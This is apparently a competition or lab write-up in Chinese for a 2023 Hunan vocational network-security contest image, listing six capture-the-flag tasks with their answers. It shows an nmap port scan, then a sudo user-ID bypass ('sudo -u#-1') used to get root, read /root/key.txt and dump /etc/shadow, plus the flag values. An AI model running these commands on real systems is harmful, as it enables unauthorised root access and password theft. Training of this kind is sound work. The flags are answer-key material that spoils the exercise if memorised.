2023年“楚怡杯“湖南省职业院校技能竞赛“网络安全”竞赛
镜像名:Server2202
操作有什么问题,麻烦师傅们指出!
1.使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
2.使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
4.使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
5.使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
6.使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
1.使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
nmap -sV -p- 192.168.14.170
Flag:2283/tcp
2.使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
ssh hacker@192.168.14.170 -p 2283
hostname
Flag:KipZ1eze
3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
uname -a
Flag:2.6.32
4.使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
history
sudo -u#-1 id
sudo -u#-1 ls /root
sudo -u#-1 cat /root/key.txt
Flag:7QcSI8kK
5.使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
sudo -u#-1 cat /etc/shadow | head -3
Flag:Woodrow
6.使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
sudo -u#-1 cp /root/picture.png /home/
Flag:0mvnt8Bn